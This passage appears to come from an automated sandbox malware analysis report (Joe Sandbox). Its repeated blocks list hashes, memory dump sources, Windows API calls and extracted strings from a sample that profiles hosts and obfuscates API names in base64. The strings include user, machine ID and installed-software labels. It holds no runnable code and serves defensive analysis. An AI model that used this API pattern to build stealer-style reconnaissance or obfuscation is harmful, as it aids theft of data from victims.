              • Opcode Fuzzy Hash: f3d3d353f5460e81a2df8597d45737ef6fda4a7224c0e88d4ab7bb144127112c
              • Instruction Fuzzy Hash: 1A900270755191468A4817716D4DA052590AB497867910CA16111EC456DA5580006559
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
              • Instruction ID: 02ddc429cb02bd866a18ab1ddff720b286fb93f352244a513b5dd10de47944d5
              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
              • Instruction Fuzzy Hash: 7BC1A373D4BDB2498735462D042823FEE626ED6B4071FD396DCD43F28DC22A6D1296D8
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
              • Instruction ID: c4cea4521175b38a24b7b34e8429397f5bf43a9884553485ab11a26f0f39e71e
              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
              • Instruction Fuzzy Hash: D6C1A273D4ADB2058B35462D042827FEEA26FD6B4171FD392DCD43F28DC22A6D1296D8
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
              • Instruction ID: 17195740ce09d02e5e7936acd53f7eae0f80a3c3001f78ed52e8aeb6d3e24d98
              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
              • Instruction Fuzzy Hash: A5C1A373D5A9B2098B36462D042827FEEA16EC6B4071FD392CCD43F28DD62B7D1295D8
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
              • Instruction ID: a9eade919a30f646802bb3883adb71f2fc6af4575888a818f5cffaf0554c396e
              • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
              • Instruction Fuzzy Hash: 55B1A433D4B8B2058735462D04582BFEE62AED6B4171FD3D6CCD43F289D22ABD1295D8
              Memory Dump Source
              • Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
              • Instruction ID: 4127abdf7b9da8008a9f2c18e61219539c276977eae78527ef69dcaf7316826f
              • Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
              • Instruction Fuzzy Hash: 70F0CD77A419048FDB20EF64C845BAE73F9FB84315F5444AAE80AD7242E338A901CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
              • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
              • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
              • Instruction Fuzzy Hash:
              APIs
              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$CreateDirectory$LibraryLoad
              • String ID: %TEMP%\$%appdata%\$PATH
              • API String ID: 1305945209-1089150275
              • Opcode ID: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
              • Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
              • Opcode Fuzzy Hash: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
              • Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59
              APIs
              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$CreateDirectory$LibraryLoad
              • String ID: %TEMP%\$%appdata%\$PATH
              • API String ID: 1305945209-1089150275
              • Opcode ID: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
              • Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
              • Opcode Fuzzy Hash: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
              • Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59
              APIs
              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$CreateDirectory$LibraryLoad
              • String ID: %TEMP%\$%appdata%\$PATH
              • API String ID: 1305945209-1089150275
              • Opcode ID: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
              • Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
              • Opcode Fuzzy Hash: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
              • Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59
              APIs
              • GetSystemMetrics.USER32(00000000), ref: 004173D7
              • GetSystemMetrics.USER32(00000001), ref: 004173EE
                • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
              • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
              • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
              • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
              • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
              • API String ID: 75899496-943277980
              • Opcode ID: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
              • Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
              • Opcode Fuzzy Hash: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
              • Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19
              APIs
              • GetSystemMetrics.USER32(00000000), ref: 004173D7
              • GetSystemMetrics.USER32(00000001), ref: 004173EE
                • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
              • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
              • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
              • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
              • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
              • API String ID: 75899496-943277980
              • Opcode ID: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
              • Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
              • Opcode Fuzzy Hash: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
              • Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19
              APIs
              • GetSystemMetrics.USER32(00000000), ref: 004173D7
              • GetSystemMetrics.USER32(00000001), ref: 004173EE
                • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
              • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
              • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
              • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
              • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
              • API String ID: 75899496-943277980
              • Opcode ID: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
              • Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
              • Opcode Fuzzy Hash: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
              • Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
              • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
              • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
              • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
              • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc$FileModuleName
              • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
              • API String ID: 2206896924-1825016774
              • Opcode ID: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
              • Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
              • Opcode Fuzzy Hash: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
              • Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
              • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
              • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
              • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
              • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc$FileModuleName
              • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
              • API String ID: 2206896924-1825016774
              • Opcode ID: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
              • Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
              • Opcode Fuzzy Hash: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
              • Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
              • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc$CurrentProcess
              • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
              • API String ID: 3877065590-4127804628
              • Opcode ID: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
              • Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
              • Opcode Fuzzy Hash: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
              • Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
              • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc$CurrentProcess
              • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
              • API String ID: 3877065590-4127804628
              • Opcode ID: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
              • Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
              • Opcode Fuzzy Hash: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
